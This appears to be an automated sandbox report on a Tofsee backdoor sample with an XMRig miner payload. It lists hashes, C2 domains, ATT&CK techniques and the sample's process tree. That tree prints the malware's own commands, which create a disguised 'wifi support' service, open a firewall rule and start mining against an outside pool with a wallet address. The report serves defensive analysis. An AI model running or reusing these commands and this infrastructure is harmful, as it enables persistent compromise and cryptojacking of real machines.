Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    14-06-2022 05:10

General

  • Target

    a30ba96e21a5300a5e4ab1a098e78f955fe8683338392b5e78b97d49f7470189.exe

  • Size

    261KB

  • MD5

    9c17d74d9ad41728e29f4c605a9d25b1

  • SHA1

    5b6240ad09e0ab2b4fff4a2c27ffa7489fec6f94

  • SHA256

    a30ba96e21a5300a5e4ab1a098e78f955fe8683338392b5e78b97d49f7470189

  • SHA512

    ce5086675486826360fa5e3df5cd19626e5625b256242109a10486884331c7ed78ac0a0c9d588a5cd40a3d9ccd184c6175f5c37198840e4f470fc40c364530bd

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a30ba96e21a5300a5e4ab1a098e78f955fe8683338392b5e78b97d49f7470189.exe
    "C:\Users\Admin\AppData\Local\Temp\a30ba96e21a5300a5e4ab1a098e78f955fe8683338392b5e78b97d49f7470189.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3456
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zrjkqycs\
      2⤵
        PID:3312
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fmduvync.exe" C:\Windows\SysWOW64\zrjkqycs\
        2⤵
          PID:2264
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create zrjkqycs binPath= "C:\Windows\SysWOW64\zrjkqycs\fmduvync.exe /d\"C:\Users\Admin\AppData\Local\Temp\a30ba96e21a5300a5e4ab1a098e78f955fe8683338392b5e78b97d49f7470189.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1156
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description zrjkqycs "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2620
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start zrjkqycs
          2⤵
          • Launches sc.exe
          PID:2732
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:2080
      • C:\Windows\SysWOW64\zrjkqycs\fmduvync.exe
        C:\Windows\SysWOW64\zrjkqycs\fmduvync.exe /d"C:\Users\Admin\AppData\Local\Temp\a30ba96e21a5300a5e4ab1a098e78f955fe8683338392b5e78b97d49f7470189.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4088
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1296

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\fmduvync.exe
        Filesize

        14.8MB

        MD5

        a39ebc58b961bde0f11dc706264cb84a

        SHA1

        3b86e17817abcb9828fb856a7e9bdd466aa788c2

        SHA256

        2f74062206b310bda890ed5540c304dee84b4eb0d4523c82f5ef3d8937f6ecb1

        SHA512

        a1e901ee12a123d648b88eb63c64d9277f85cb92e61e7bcd45dc471916ba9f16961617063f0b6267ad67a8f3be80cdfd75708cf6a1ea4b827a968a3e0f52c4ce

      • C:\Windows\SysWOW64\zrjkqycs\fmduvync.exe
        Filesize

        14.8MB

        MD5

        a39ebc58b961bde0f11dc706264cb84a

        SHA1

        3b86e17817abcb9828fb856a7e9bdd466aa788c2

        SHA256

        2f74062206b310bda890ed5540c304dee84b4eb0d4523c82f5ef3d8937f6ecb1

        SHA512

        a1e901ee12a123d648b88eb63c64d9277f85cb92e61e7bcd45dc471916ba9f16961617063f0b6267ad67a8f3be80cdfd75708cf6a1ea4b827a968a3e0f52c4ce

      • memory/1156-181-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/1156-177-0x0000000000000000-mapping.dmp
      • memory/1156-178-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/1156-179-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/1156-180-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/1296-508-0x0000000002D6259C-mapping.dmp
      • memory/2080-211-0x0000000000000000-mapping.dmp
      • memory/2264-173-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/2264-172-0x0000000000000000-mapping.dmp
      • memory/2264-182-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/2264-174-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/2264-175-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/2264-176-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/2440-316-0x0000000000E8C000-0x0000000000E9D000-memory.dmp
        Filesize

        68KB

      • memory/2440-320-0x0000000000400000-0x0000000000B34000-memory.dmp
        Filesize

        7.2MB

      • memory/2440-318-0x0000000000B40000-0x0000000000C8A000-memory.dmp
        Filesize

        1.3MB

      • memory/2620-184-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/2620-185-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/2620-183-0x0000000000000000-mapping.dmp
      • memory/2732-191-0x0000000000000000-mapping.dmp
      • memory/3312-166-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3312-165-0x0000000000000000-mapping.dmp
      • memory/3312-167-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3312-168-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3312-169-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3312-170-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-135-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-171-0x0000000000400000-0x0000000000B34000-memory.dmp
        Filesize

        7.2MB

      • memory/3456-147-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-149-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-151-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-150-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-152-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-153-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-155-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-154-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-156-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-158-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-157-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-160-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-161-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-163-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-164-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-144-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-143-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-142-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-141-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-140-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-137-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-162-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-159-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-148-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-145-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-146-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-139-0x0000000000BA0000-0x0000000000C4E000-memory.dmp
        Filesize

        696KB

      • memory/3456-138-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-116-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-136-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-134-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-133-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-132-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-131-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-129-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-130-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-128-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-127-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-126-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-125-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-124-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-123-0x0000000000C41000-0x0000000000C51000-memory.dmp
        Filesize

        64KB

      • memory/3456-122-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-215-0x0000000000400000-0x0000000000B34000-memory.dmp
        Filesize

        7.2MB

      • memory/3456-121-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-117-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-120-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-119-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/3456-118-0x0000000077570000-0x00000000776FE000-memory.dmp
        Filesize

        1.6MB

      • memory/4088-405-0x00000000030F0000-0x0000000003105000-memory.dmp
        Filesize

        84KB

      • memory/4088-482-0x00000000030F0000-0x0000000003105000-memory.dmp
        Filesize

        84KB

      • memory/4088-312-0x00000000030F9A6B-mapping.dmp